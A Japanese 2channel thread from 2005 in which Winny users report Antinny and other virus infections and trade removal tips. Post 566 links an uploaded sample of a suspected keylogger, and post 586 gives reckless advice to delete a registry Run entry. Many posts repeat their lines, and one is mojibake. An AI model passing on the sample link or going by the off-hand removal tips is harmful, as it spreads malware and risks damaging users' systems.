【症状か具体的に、分かる限りすべて書く】
ゲームの予約特典ディスクをおとしてウイルスチェック→みつからず
予約特典.exe実行→「捏造です、せっかくだからウイルス入れときます。プッ」
とメッセージ、ネットには接続していなかったのでとりあえずチェック→何も見つからず
怖いので違うパソから現在書き込み中
しかし、何にも症状が現れないからかえって怖い
よってこれから再インスコ
みんなも気をつけて
【WindowsUpdateしてるか】 はい。
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】 はい。
【症状か具体的に、分かる限りすべて書く】
ゲームの予約特典ディスクをおとしてウイルスチェック→みつからず
予約特典.exe実行→「捏造です、せっかくだからウイルス入れときます。プッ」
とメッセージ、ネットには接続していなかったのでとりあえずチェック→何も見つからず
怖いので違うパソから現在書き込み中
しかし、何にも症状が現れないからかえって怖い
よってこれから再インスコ
みんなも気をつけて
552 :[名無し]さん(bin+cue).rar:05/01/17 12:48:27 ID:/iXeyqWy
脅しじゃねの
553 :[名無し]さん(bin+cue).rar:05/01/17 12:54:34 ID:1ju5kb9i
>>551
それくらい臆病なほうが、この世界では長生きできる。
それくらい臆病なほうが、この世界では長生きできる。
554 :[名無し]さん(bin+cue).rar:05/01/17 13:46:11 ID:GxBmydud
>551
どうせハジを晒すなら、何のゲームの予約特典かおかあさんにわかるように
じっくりと語ってみてはどうだろうか?
どうせハジを晒すなら、何のゲームの予約特典かおかあさんにわかるように
じっくりと語ってみてはどうだろうか?
555 :[名無し]さん(bin+cue).rar:05/01/17 15:56:11 ID:NpmQo5zP
556 :[名無し]さん(bin+cue).rar:05/01/17 17:15:27 ID:oU5usvBc
557 :[名無し]さん(bin+cue).rar:05/01/17 17:22:34 ID:g5OP02Iw
俺も去年の大晦日に >551踏んじまったけど
わざわざウィルスですよなんて言うウイルスソフトなんてねーだとと思ったので
放置しといた。別に今まで何もないよ
わざわざウィルスですよなんて言うウイルスソフトなんてねーだとと思ったので
放置しといた。別に今まで何もないよ
558 :[名無し]さん(bin+cue).rar:05/01/17 17:51:27 ID:Aw7CrdKr
こんなもん作って何が面白いんだろな。
559 :[名無し]さん(bin+cue).rar:05/01/17 18:32:22 ID:edU6mWcl
掛かったヤツが掲示板に書き込んでるのを見てプゲラゲラゲラ
560 :[名無し]さん(bin+cue).rar:05/01/17 19:04:48 ID:63onPZnc
非公開のプライベート掲示板に個人情報ぶっこ抜きでプゲラ(ry
561 :[名無し]さん(bin+cue).rar:05/01/17 19:08:27 ID:3NluDYDk
便所
562 :[名無し]さん(bin+cue).rar:05/01/17 20:00:48 ID:B2JQ+ZZj,
恋の病にかかってみたい
563 :[名無し]さん(bin+cue).rar:05/01/17 21:18:13 ID:2tcjE7S30
肥えの病?
564 :[名無し]さん(bin+cue).rar:05/01/17 22:10:33 ID:63onPZnc0
故意の病?
565 :[名無し]さん(bin+cue).rar:05/01/18 00:32:51 ID:pE69acO20
・・恋なんてどうでもいいよ
普通に結婚できればいい、めんどくさい。
普通に結婚できればいい、めんどくさい。
>>549
やっぱりアンチウィルスいれておくべきでした。
拡張子に引っかかるなんて・・・orz
>>555
一応2ちゃんうpロダに上げてみました
なんか普通のウィルスだったらスイマセン
ttp://up.isp.2ch.net/up/9fed1eac940d.zip
やっぱりアンチウィルスいれておくべきでした。
拡張子に引っかかるなんて・・・orz
>>555
一応2ちゃんうpロダに上げてみました
なんか普通のウィルスだったらスイマセン
ttp://up.isp.2ch.net/up/9fed1eac940d.zip
567 :[名無し]さん(bin+cue).rar:05/01/18 03:02:12 ID:n9ckfICE0
>566
一応でもパス付きにしとけよ
詳しくは解らないけど、DUMPした分にはトロイっぽい記述があるかも
一応でもパス付きにしとけよ
詳しくは解らないけど、DUMPした分にはトロイっぽい記述があるかも
568 :[名無し]さん(bin+cue).rar:05/01/18 09:15:53 ID:yBzYo9260
>>565
、ハ、ヌキ?コァ、キ、ソ、、、ホ、ォハケ、ュ、ソ、、
、ハ、ォタ、、ホテ讀ソ、、、ニ、、、ホソヘ、ャキ?コァ、キ、ソ、、、゚、ソ、、、タ、ア、ノ。「キ?コァ、ケ、?、ネ、ハ、ォホノ、、サャ、「、?、ホ。ゥ
イソ、ォイカ、ホテホ、鬢ハ、、。「・ヌ・皈?・テ・ネ、蟯?・皈?・テ・ネ、ャ、「、?、タ、タヲ、ォ
、ハ、ヌキ?コァ、キ、ソ、、、ホ、ォハケ、ュ、ソ、、
、ハ、ォタ、、ホテ讀ソ、、、ニ、、、ホソヘ、ャキ?コァ、キ、ソ、、、゚、ソ、、、タ、ア、ノ。「キ?コァ、ケ、?、ネ、ハ、ォホノ、、サャ、「、?、ホ。ゥ
イソ、ォイカ、ホテホ、鬢ハ、、。「・ヌ・皈?・テ・ネ、蟯?・皈?・テ・ネ、ャ、「、?、タ、タヲ、ォ
569 :[名無し]さん(bin+cue).rar:05/01/18 10:17:34 ID:vjMyNaO10
>>568
禿同
禿同
570 :[名無し]さん(bin+cue).rar:05/01/18 10:40:10 ID:1uHYY0oE0
>>568
読めねーよ。
読めねーよ。
571 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
572 :[名無し]さん(bin+cue).rar:05/01/18 13:39:33 ID:1uHYY0oE0
573 :[名無し]さん(bin+cue).rar:05/01/18 15:12:34 ID:UbNUcjVC0
>>566
むーん。ダンプイメージは、Unicodeだと日本語のメッセージがボロボロ
入ってるが…。キーロガーを作ろうとして大失敗っぽいな。
コールしてるプロセスを見ると、ログをSMTP経由でどこかに飛ばすようだが…
これじゃまともに動かんだろ。
一応、先生に送っとくか
むーん。ダンプイメージは、Unicodeだと日本語のメッセージがボロボロ
入ってるが…。キーロガーを作ろうとして大失敗っぽいな。
コールしてるプロセスを見ると、ログをSMTP経由でどこかに飛ばすようだが…
これじゃまともに動かんだろ。
一応、先生に送っとくか
574 :[名無し]さん(bin+cue).rar:05/01/18 15:45:38 ID:sqr1EB4q0
>>568
メリットとかデメリットじゃなくてみんなしてるから
メリットとかデメリットじゃなくてみんなしてるから
575 :[名無し]さん(bin+cue).rar:05/01/18 21:00:45 ID:uYFOfOHG0
576 :[名無し]さん(bin+cue).rar:05/01/18 21:03:00 ID:uYFOfOHG0
あ、ここ消せないのか…。
>>567 573
解析ありがとうございます。
まともに動かないのなら安心です。
でも怖いので再インスコしましたが。
>>575
すいません 消せませんでした。。。
パスかけて上げる、必要ももう無さそうなので
このまま放置したいと思います。
解析ありがとうございます。
まともに動かないのなら安心です。
でも怖いので再インスコしましたが。
>>575
すいません 消せませんでした。。。
パスかけて上げる、必要ももう無さそうなので
このまま放置したいと思います。
578 :[名無し]さん(bin+cue).rar:05/01/18 21:53:14 ID:IBpOzSlI0
なぜパス掛けて上げなければいけないかの重要性を認識していらっしゃらないご様子
自己中な奴
自己中な奴
579 :[名無し]さん(bin+cue).rar:05/01/18 23:31:47 ID:iDwILx1V0
【使用OS】 Windows XP
【WindowsUpdateしてるか】 している
【AntiVirusは】 していない
【オンラインスキャンしたならその結果は】 Virus Chaser使用 Win32.HLLW.Antinny.12
【Winnyのバージョン】 2.0b 7.1
【Winny歴、総DL量は】 不明
【テンプレを読んだか】 読了
【テンプレにある対策を実行したか】 実行
【症状か具体的に、分かる限りすべて書く】
Virus Chaserを使用して駆除したが、regedit.exeが元に戻らない(Notepadのまま)
【何をしたらそんなことになったのか】 不明、おそらくアイコンに引っかかったと思われる
【これまでにとった措置】
Virus Chaserを使用して駆除、ny削除、可能な限りの>>8テンプレの指示に従った行為
馬鹿の尻拭いをやらされているPC中級者…と勝手に思われているものです。
どうかお力をお貸し下さい。
【WindowsUpdateしてるか】 している
【AntiVirusは】 していない
【オンラインスキャンしたならその結果は】 Virus Chaser使用 Win32.HLLW.Antinny.12
【Winnyのバージョン】 2.0b 7.1
【Winny歴、総DL量は】 不明
【テンプレを読んだか】 読了
【テンプレにある対策を実行したか】 実行
【症状か具体的に、分かる限りすべて書く】
Virus Chaserを使用して駆除したが、regedit.exeが元に戻らない(Notepadのまま)
【何をしたらそんなことになったのか】 不明、おそらくアイコンに引っかかったと思われる
【これまでにとった措置】
Virus Chaserを使用して駆除、ny削除、可能な限りの>>8テンプレの指示に従った行為
馬鹿の尻拭いをやらされているPC中級者…と勝手に思われているものです。
どうかお力をお貸し下さい。
580 :[名無し]さん(bin+cue).rar:05/01/18 23:40:30 ID:byYj1Pgi0
581 :[名無し]さん(bin+cue).rar:05/01/18 23:43:10 ID:WPZMu0cf0
その前にAntiVirusを使ってない理由を述べろ
582 :[名無し]さん(bin+cue).rar:05/01/18 23:49:22 ID:iDwILx1V0
>>580
ありがとう御座いました。夜中に気が急いていたのか、見落としていました。
見たところregedt32.exeもノートパッドでしたので、これも修正の必要が。気付いてよかったです。
>>581
キンタマ踏んだ馬鹿が金をケチって入れてなかったそうです。
「定期的にオンラインスキャンしてればいいと思ってた」(本人談)とか抜かしくさりよりました。
ありがとう御座いました。夜中に気が急いていたのか、見落としていました。
見たところregedt32.exeもノートパッドでしたので、これも修正の必要が。気付いてよかったです。
>>581
キンタマ踏んだ馬鹿が金をケチって入れてなかったそうです。
「定期的にオンラインスキャンしてればいいと思ってた」(本人談)とか抜かしくさりよりました。
583 :[名無し]さん(bin+cue).rar:05/01/19 00:03:16 ID:zf81Lr9q0
ウイルスにやられてから、
オンラインスキャンで「やられた!!」ってことですね。
能率いいですね。
オンラインスキャンで「やられた!!」ってことですね。
能率いいですね。
584 :[名無し]さん(bin+cue).rar:05/01/19 00:31:41 ID:D7z8KOV60
テンプレしっかり埋めてきてるなら、「友達に聞かれた」とか
「本人談」とか正直どうでもいい。つか、遠隔操作でウイルス
退治するくらい、もどかしいものはない。
本人に直接ここに来るように言ってくれ。
「本人談」とか正直どうでもいい。つか、遠隔操作でウイルス
退治するくらい、もどかしいものはない。
本人に直接ここに来るように言ってくれ。
585 :[名無し]さん(bin+cue).rar:05/01/19 03:08:52 ID:bqJsk+ld0
【使用OS】 XP
【AntiVirusは】 ノートン
【スキャンした結果】 antinny.G
【Winnyのバージョン】 2.0b 7.1
【これまでにとった措置】 exeをダブクリの直後、ノートンでスキャン→該当を削除。
regeditは無事。
>Q.レジストリ、HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runでどれを消せばいいのかわかりません
>A.ここのリスト参照、もちろん怪しいのは削除
> http://higaitaisaku.web.infoseek.co.jp/iru.html
↑が403 Forbiddenなのですが
どういうのが怪しいのか教えてください。
"<ランダムに選択されたプログラムの名前>"="<ワームのパス>" (/logon, /start, /autorun, /startup のうちいずれかのオプションが付きます。)
だそうですが、
名前・・・NvCplDaemon
データ・・RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
なんてのは違うんでしょうか。
【AntiVirusは】 ノートン
【スキャンした結果】 antinny.G
【Winnyのバージョン】 2.0b 7.1
【これまでにとった措置】 exeをダブクリの直後、ノートンでスキャン→該当を削除。
regeditは無事。
>Q.レジストリ、HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runでどれを消せばいいのかわかりません
>A.ここのリスト参照、もちろん怪しいのは削除
> http://higaitaisaku.web.infoseek.co.jp/iru.html
↑が403 Forbiddenなのですが
どういうのが怪しいのか教えてください。
"<ランダムに選択されたプログラムの名前>"="<ワームのパス>" (/logon, /start, /autorun, /startup のうちいずれかのオプションが付きます。)
だそうですが、
名前・・・NvCplDaemon
データ・・RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
なんてのは違うんでしょうか。
586 :[名無し]さん(bin+cue).rar:05/01/19 04:45:59 ID:kuBkmll/0
rundll32.exeは通常のシステムファイルだが、
ワームなりウイルスが上書きしてる可能性もあるな。
試しに消してみたらいいんでないの?
結果、OSがアボンしても知らん。
ワームなりウイルスが上書きしてる可能性もあるな。
試しに消してみたらいいんでないの?
結果、OSがアボンしても知らん。
587 :[名無し]さん(bin+cue).rar:05/01/19 04:52:13 ID:pCwBdc6G0
588 :[名無し]さん(bin+cue).rar:05/01/19 10:58:15 ID:38gxRlPt0
措置の質問は既出
過去ログも読まない奴は放置推奨
過去ログも読まない奴は放置推奨
589 :[名無し]さん(bin+cue).rar:05/01/19 15:55:10 ID:NztY+YuE0
【使用OS】 XPホームエディション
【WindowsUpdateしてるか】 はい。
【AntiVirusは】 ウイルスセキュリティを使ってました…
【ちゃんとUpdateしてるか】 はい。
【スキャンした結果】 雑誌の付録のAVGを試してみたらAntinny Kが山ほど出てきました。
【オンラインスキャンしたならその結果は】 AVGでKはKは削除できたみたいです。
【Winnyのバージョン】 2.0b 7.1
【Winny歴、総DL量は】 12/20日くらいからはじめました。
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 再パーティションをしてインストールし直しました。
【症状か具体的に、分かる限りすべて書く】 CPU使用率が100%に。CDの書き込みが失敗する。l
【何をしたらそんなことになったのか】 拡張子の表示をしてなかったので、踏んでしまったんだと思います。
知らない間にUPフォルダが出来ていて音楽名のアイコンが4つぐらいあり、クリックしてしまいました。
【これまでにとった措置】 再パーティションをしてインストールし直しました。
知識が足りなくて感染してしまいました。
アップフォルダに詰め合わせやJPGができていなかったなら情報の流出はないのでしょうか?
それと、1/1より前にクリーンインストールしたのですが、大丈夫でしょうか。
ぜひ教えてください。
【WindowsUpdateしてるか】 はい。
【AntiVirusは】 ウイルスセキュリティを使ってました…
【ちゃんとUpdateしてるか】 はい。
【スキャンした結果】 雑誌の付録のAVGを試してみたらAntinny Kが山ほど出てきました。
【オンラインスキャンしたならその結果は】 AVGでKはKは削除できたみたいです。
【Winnyのバージョン】 2.0b 7.1
【Winny歴、総DL量は】 12/20日くらいからはじめました。
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 再パーティションをしてインストールし直しました。
【症状か具体的に、分かる限りすべて書く】 CPU使用率が100%に。CDの書き込みが失敗する。l
【何をしたらそんなことになったのか】 拡張子の表示をしてなかったので、踏んでしまったんだと思います。
知らない間にUPフォルダが出来ていて音楽名のアイコンが4つぐらいあり、クリックしてしまいました。
【これまでにとった措置】 再パーティションをしてインストールし直しました。
知識が足りなくて感染してしまいました。
アップフォルダに詰め合わせやJPGができていなかったなら情報の流出はないのでしょうか?
それと、1/1より前にクリーンインストールしたのですが、大丈夫でしょうか。
ぜひ教えてください。
590 :[名無し]さん(bin+cue).rar:05/01/19 16:49:58 ID:625V7QmI0
>>589
情報流出おめ(・∀・)
情報流出おめ(・∀・)
591 :[名無し]さん(bin+cue).rar:05/01/19 16:52:55 ID:kuBkmll/0
592 :[名無し]さん(bin+cue).rar:05/01/19 17:12:03 ID:7dVquAQL0
パーティションぶった切って再インスコしたのにまだ異常なのか
593 :[名無し]さん(bin+cue).rar:05/01/19 18:16:05 ID:n7IBdg4t0
流出したかどうか俺が代わりに調べてあげても良いよ?
594 :[名無し]さん(bin+cue).rar:05/01/19 18:30:39 ID:Sxv8uAwr0
よせ
595 :[名無し]さん(bin+cue).rar:05/01/19 19:41:13 ID:9jAdnkLA0
【使用OS】 win2000
【WindowsUpdateしてるか】 してます
【AntiVirusは】 してません
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量は】一ヶ月弱です。DL量は1Gくらいです。
【テンプレを読んだか】 はい
【症状か具体的に、分かる限りすべて書く】CPU使用率が100%になる。winnyフォルダ内に
upフォルダが作成された。HDDの空き容量がどんどん減っていった。
【何をしたらそんなことになったのか】.exeをうっかり実行してしまいました
【これまでにとった措置】パニックになってwinnyフォルダごと削除してしまいました
フォルダを削除したら症状は収まりました。焦って、スキャンする前に削除してしまったので
どの種類に感染したかも分かりません。これでもう情報流出の恐れはないのでしょうか?
教えて下さい。
【WindowsUpdateしてるか】 してます
【AntiVirusは】 してません
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量は】一ヶ月弱です。DL量は1Gくらいです。
【テンプレを読んだか】 はい
【症状か具体的に、分かる限りすべて書く】CPU使用率が100%になる。winnyフォルダ内に
upフォルダが作成された。HDDの空き容量がどんどん減っていった。
【何をしたらそんなことになったのか】.exeをうっかり実行してしまいました
【これまでにとった措置】パニックになってwinnyフォルダごと削除してしまいました
フォルダを削除したら症状は収まりました。焦って、スキャンする前に削除してしまったので
どの種類に感染したかも分かりません。これでもう情報流出の恐れはないのでしょうか?
教えて下さい。
596 :[名無し]さん(bin+cue).rar:05/01/19 20:01:54 ID:25cJrEgy0
597 :[名無し]さん(bin+cue).rar:05/01/19 20:02:34 ID:U0ira5h10
598 :[名無し]さん(bin+cue).rar:05/01/19 20:36:47 ID:duUxOhuF0
【使用OS】 XP
【WindowsUpdateしてるか】 YES
【AntiVirusは】 Norton2002
【ちゃんとUpdateしてるか】 YES
【スキャンした結果】 W32.HLLW.Antinnyが1つ
【オンラインスキャンしたならその結果は】 今やってる途中
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量は】 1年−100Gくらい
【テンプレを読んだか】 YES
【テンプレにある対策を実行したか】 YES
【症状か具体的に、分かる限りすべて書く】 貯めていたキャッシュが全て消滅。Upフォルダが消しても消しても作られる。
中身は、落とした覚えのない?の付いたロボットらしき物体のアイコンが付いたLZHファイル。
しかしUpフォルダが作られているはずなのに、実際のwinnyのフォルダにはUpフォルダ存在せず(隠しファイルになっている模様)
【何をしたらそんなことになったのか】 コッチが聞きたい・・・あ〜でも今まで普通に解凍する際exe踏んでたなぁ(´・ω・`)
【これまでにとった措置】 とにかくスキャンして引っかかったファイルの削除のみ。
599 :[名無し]さん(bin+cue).rar:05/01/19 20:39:56 ID:bcqFPtIS0
>>598
うはははははw
うはははははw
600 :[名無し]さん(bin+cue).rar:05/01/19 20:47:28 ID:ZuxOpX4G0
Winny関連だけでなく文字通りすべて全ドライブのファイルが消された
こんなウイルスってあるの?まじびびった
こんなウイルスってあるの?まじびびった
601 :[名無し]さん(bin+cue).rar:05/01/19 21:00:33 ID:IdY48Vfg0
普通にありますが何か?
602 :[名無し]さん(bin+cue).rar:05/01/19 21:58:01 ID:M3+F7MR20
【使用OS】XP
【WindowsUpdateしてるか】yes
【AntiVirusは】ウィルスバスター
【ちゃんとUpdateしてるか】yes
【スキャンした結果】ANTINNY_A, ANTINNY_G, ANTINNY_I, PE_Parite_A27個
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】2.0b7.1 と1.14(昔数回使った)
【Winny歴、総DL量は】2年前ぐらい(実際頻繁に使っていたのはここ1年のみ) 10G
【テンプレを読んだか】yes
【テンプレにある対策を実行したか】yes
【症状か具体的に、分かる限りすべて書く】自覚症状はありません
【何をしたらそんなことになったのか】フォルダアイコン型の.exeを実行したため
【これまでにとった措置】
VBが駆除してくれたPE_Parite_A以外は全て削除しました。ダウンフォルダを残して
nyフォルダを削除しました。レジストリエディタを開き/startup となっているものを一つ削除しました。
antinny killerというソフトではレジストリから感染は見つかりませんでした。
del_nullpo.regをDLし実行しました。
C:\Program Filesの.exeを検索しましたが、フォルダ型のexeは見つかりませんでした。
TempフォルダにNy.exeはありませんでした。WIN.INIに
[hoge]
hugo=<Winny ファイル共有プログラムのパス>
があったので消しました。このパスが、感染時期以前にしか使用していない
1.14バージョンの方になっていました。2.0b7.1でウィルスをDLして
1.14バージョンが感染するということはあるんでしょうか?
感染以降2.0b7.1しか使用していないので個人情報は流出していないということでしょうか?
よろしくおねがいします。
【WindowsUpdateしてるか】yes
【AntiVirusは】ウィルスバスター
【ちゃんとUpdateしてるか】yes
【スキャンした結果】ANTINNY_A, ANTINNY_G, ANTINNY_I, PE_Parite_A27個
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】2.0b7.1 と1.14(昔数回使った)
【Winny歴、総DL量は】2年前ぐらい(実際頻繁に使っていたのはここ1年のみ) 10G
【テンプレを読んだか】yes
【テンプレにある対策を実行したか】yes
【症状か具体的に、分かる限りすべて書く】自覚症状はありません
【何をしたらそんなことになったのか】フォルダアイコン型の.exeを実行したため
【これまでにとった措置】
VBが駆除してくれたPE_Parite_A以外は全て削除しました。ダウンフォルダを残して
nyフォルダを削除しました。レジストリエディタを開き/startup となっているものを一つ削除しました。
antinny killerというソフトではレジストリから感染は見つかりませんでした。
del_nullpo.regをDLし実行しました。
C:\Program Filesの.exeを検索しましたが、フォルダ型のexeは見つかりませんでした。
TempフォルダにNy.exeはありませんでした。WIN.INIに
[hoge]
hugo=<Winny ファイル共有プログラムのパス>
があったので消しました。このパスが、感染時期以前にしか使用していない
1.14バージョンの方になっていました。2.0b7.1でウィルスをDLして
1.14バージョンが感染するということはあるんでしょうか?
感染以降2.0b7.1しか使用していないので個人情報は流出していないということでしょうか?
よろしくおねがいします。
603 :[名無し]さん(bin+cue).rar:05/01/19 22:20:34 ID:eObkt7290
604 :[名無し]さん(bin+cue).rar:05/01/19 23:17:43 ID:kuBkmll/0
605 :[名無し]さん(bin+cue).rar:05/01/20 01:01:08 ID:UlfeY26KO
ウイルスだかよくわからないので報告です
【使用OS】XPsp1
【WindowsUpdateしてるか】してる
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】してる
【スキャンした結果】検出されず
【オンラインスキャンしたならその結果は】まだしてない
【Winnyのバージョン】2.0 b7.2
【Winny歴、総DL量は】1ヶ月くらい
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】対策無し
【症状か具体的に、分かる限りすべて書く】Cドライブを分析するとレジストリが断片化されまくっている。
(その後ネットに繋がらなくなりOSも起動不能に?
【何をしたらそんなことになったのか】nyやってた
【これまでにとった措置】最適化
一応、推奨無視リストを入れ.exeなどは実行していないし、落としてすらいません。またダウンしたのは必ずノートンでチェックしてました。
前に同じ症状が出た時はその後にネットに繋がらなくなり更にOSが起動しなくなったためリカバリしました。
今はネット切って色々調べてます。
これはウイルスの仕業ですか?それともただの偶然ですか?
ちなみにnyをやるまえはレジストリの断片化などほとんど無かったです。
【使用OS】XPsp1
【WindowsUpdateしてるか】してる
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】してる
【スキャンした結果】検出されず
【オンラインスキャンしたならその結果は】まだしてない
【Winnyのバージョン】2.0 b7.2
【Winny歴、総DL量は】1ヶ月くらい
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】対策無し
【症状か具体的に、分かる限りすべて書く】Cドライブを分析するとレジストリが断片化されまくっている。
(その後ネットに繋がらなくなりOSも起動不能に?
【何をしたらそんなことになったのか】nyやってた
【これまでにとった措置】最適化
一応、推奨無視リストを入れ.exeなどは実行していないし、落としてすらいません。またダウンしたのは必ずノートンでチェックしてました。
前に同じ症状が出た時はその後にネットに繋がらなくなり更にOSが起動しなくなったためリカバリしました。
今はネット切って色々調べてます。
これはウイルスの仕業ですか?それともただの偶然ですか?
ちなみにnyをやるまえはレジストリの断片化などほとんど無かったです。
606 :[名無し]さん(bin+cue).rar:05/01/20 01:03:24 ID:s48HJr2N0
レジストリの断片化って何だそりゃ
↑バージョンは7.1の間違いです。
608 :[名無し]さん(bin+cue).rar:05/01/20 01:31:57 ID:jJCX9aJ/0
zipで圧縮されてる写真集をDLしました。
ノートンでスキャンしたらzipがW32.AntiWinnyに感染してるというので
ノートンで駆除しました。
駆除し終わったzipを消去せず再度スキャンするとウイルスを取り除いた
みたいで(駆除)何の報告もないので、解凍して
出てきたjpgのファイルをそのままHDDに保存しようと思ってるのですが
まずいですか?zipごと消去が基本でしょうか?
ノートンでスキャンしたらzipがW32.AntiWinnyに感染してるというので
ノートンで駆除しました。
駆除し終わったzipを消去せず再度スキャンするとウイルスを取り除いた
みたいで(駆除)何の報告もないので、解凍して
出てきたjpgのファイルをそのままHDDに保存しようと思ってるのですが
まずいですか?zipごと消去が基本でしょうか?
609 :[名無し]さん(bin+cue).rar:05/01/20 01:33:00 ID:YMUny9Gi0
>>605
以前にも同じ症状が出たの?
今の俺のシステム、2年くらい使い続けてるけれど、nyで酷使しても起動不能に陥ったことないよ。
もしかして、キャッシュホルダをCドライブに置いてるんじゃないかな?
それだと断片化が進んで起動不能に陥る可能性はあるかもしれない
Dドライブ、出来ればキャッシュ専用にパーテーションを切ったほうが良いと思うよ
以前にも同じ症状が出たの?
今の俺のシステム、2年くらい使い続けてるけれど、nyで酷使しても起動不能に陥ったことないよ。
もしかして、キャッシュホルダをCドライブに置いてるんじゃないかな?
それだと断片化が進んで起動不能に陥る可能性はあるかもしれない
Dドライブ、出来ればキャッシュ専用にパーテーションを切ったほうが良いと思うよ
610 :[名無し]さん(bin+cue).rar:05/01/20 01:34:42 ID:YMUny9Gi0
611 :[名無し]さん(bin+cue).rar:05/01/20 01:35:46 ID:zBj3LAL80
>先ず、ここは初心者の質問・救済スレではありません。(これ大事)
612 :[名無し]さん(bin+cue).rar:05/01/20 01:45:09 ID:wXUwDy080
今日、仕事から帰って、nyを起動したらいきなり「外部例外」って出て強制終了した。その後も起動するたびに同じ症状になる。こんなウイルスってあったっけ?
613 :[名無し]さん(bin+cue).rar:05/01/20 01:56:47 ID:jJCX9aJ/0
614 :[名無し]さん(bin+cue).rar:05/01/20 02:12:26 ID:YMUny9Gi0
>>613
残さないなら何のためにダウンしたのかワカランだろが
残さないなら何のためにダウンしたのかワカランだろが
615 :[名無し]さん(bin+cue).rar:05/01/20 02:22:23 ID:U3jbGc7o0
616 :[名無し]さん(bin+cue).rar:05/01/20 02:26:31 ID:fVw7/OuE0
新しいタイプのウィルスが出来たって訳でも無さそうだけどな
617 :[名無し]さん(bin+cue).rar:05/01/20 02:28:40 ID:jJCX9aJ/0
>>614
確かにそうですよね。
う〜ん。。これまで運が悪いか分りませんが写真集のZIPはほとんど
ウイルス付きを落としてるんんですよね(涙
毎回捨てて一向に集まらないんでこの際お聞きしました。ありがとです。
MXでは同じ物集めてもあんまウイルスに遭遇しなかったんですが
nyを使うようになってよくウイルスにあうようになりました。
確かにそうですよね。
う〜ん。。これまで運が悪いか分りませんが写真集のZIPはほとんど
ウイルス付きを落としてるんんですよね(涙
毎回捨てて一向に集まらないんでこの際お聞きしました。ありがとです。
MXでは同じ物集めてもあんまウイルスに遭遇しなかったんですが
nyを使うようになってよくウイルスにあうようになりました。
618 :[名無し]さん(bin+cue).rar:05/01/20 02:36:19 ID:NQQ429UG0
619 :[名無し]さん(bin+cue).rar:05/01/20 02:58:17 ID:qw5u8tuu0
ノロには気をつけろ
620 :[名無し]さん(bin+cue).rar:05/01/20 03:33:45 ID:pO18E7lJ0
なんつーかありきたりなのに引っかかったくせに
糞テンプレで症状書いて本気で助けてもらおうって
奴が増えてるよう泣きがした
糞テンプレで症状書いて本気で助けてもらおうって
奴が増えてるよう泣きがした
621 :[名無し]さん(bin+cue).rar:05/01/20 06:16:50 ID:UlfeY26KO
>>606
そのまんま。最適化の時にレポート見るとレジストリの部分が断片化されてる。
>>609
ny関係は全部外付けHDに入れてる。
とりあえずリカバリしたばっかでデータも全然入ってないからまたリカバリする気持ちで原因探してみる。
話を聞く限り原因はnyでない可能性が高いな…
そのまんま。最適化の時にレポート見るとレジストリの部分が断片化されてる。
>>609
ny関係は全部外付けHDに入れてる。
とりあえずリカバリしたばっかでデータも全然入ってないからまたリカバリする気持ちで原因探してみる。
話を聞く限り原因はnyでない可能性が高いな…
622 :[名無し]さん(bin+cue).rar:05/01/20 07:05:59 ID:46zEb+yY0
aviファイル内にウイルスを仕込むことって出来るの?
ノートンさんでスキャンしたら
圧縮されたファイル○○.aviの○○.avi.exeはウイルスに感染していますって出たんだけど
圧縮されたファイルってことはzipかlzhをaviに拡張子変更した?
ノートンさんでスキャンしたら
圧縮されたファイル○○.aviの○○.avi.exeはウイルスに感染していますって出たんだけど
圧縮されたファイルってことはzipかlzhをaviに拡張子変更した?
623 :[名無し]さん(bin+cue).rar:05/01/20 08:05:16 ID:M9HjRcOyO
うん
624 :[名無し]さん(bin+cue).rar:05/01/20 08:16:36 ID:w7qhe1qo0
>>622
>>aviファイル内にウイルスを仕込むことって出来るの?
現段階ではまだじゃね
ただ最近は、>>461 >>485みたいなのもあるみたいだし、一応注意してれば
>>○○.avi.exe
この時点で捨てようよ
>>aviファイル内にウイルスを仕込むことって出来るの?
現段階ではまだじゃね
ただ最近は、>>461 >>485みたいなのもあるみたいだし、一応注意してれば
>>○○.avi.exe
この時点で捨てようよ
625 :[名無し]さん(bin+cue).rar:05/01/20 08:36:28 ID:46zEb+yY0
>>624
いや、拡張子はaviでファイル情報もビデオクリップだったから
結局そのファイルは怖いから再生せずに消したけど
ウイルスは初代ぬるぽだから古いファイルだと思うし
たぶん拡張子をaviに変更しただけだと思うけど
あと、最近ではDVDrip版のターミナルになんか仕込まれてるって話があったな
いや、拡張子はaviでファイル情報もビデオクリップだったから
結局そのファイルは怖いから再生せずに消したけど
ウイルスは初代ぬるぽだから古いファイルだと思うし
たぶん拡張子をaviに変更しただけだと思うけど
あと、最近ではDVDrip版のターミナルになんか仕込まれてるって話があったな
626 :[名無し]さん(bin+cue).rar:05/01/20 10:48:48 ID:pJzeUZby0
>いや、拡張子はaviでファイル情報もビデオクリップだったから
ウイルス対策してない時のwin98での場合で、
詳細表示では「zip file」と表示されてるのに、
カーソル当てると「not zip files」とか表示されて分かるパターンがあった。
txt.exeだろうがavi.exeだろうが実際にはEXEだけど、
また、622さんみたいにVスキャンすりゃ分かるけど、
「見た目上は」txtとaviの場合あるから、誤解なきよう。
ウイルス対策してない時のwin98での場合で、
詳細表示では「zip file」と表示されてるのに、
カーソル当てると「not zip files」とか表示されて分かるパターンがあった。
txt.exeだろうがavi.exeだろうが実際にはEXEだけど、
また、622さんみたいにVスキャンすりゃ分かるけど、
「見た目上は」txtとaviの場合あるから、誤解なきよう。
あと622=625と分かってて書いてます。
>誤解なきよう。
ってのは世間一般に対して言ってるって事でヨロ
>誤解なきよう。
ってのは世間一般に対して言ってるって事でヨロ
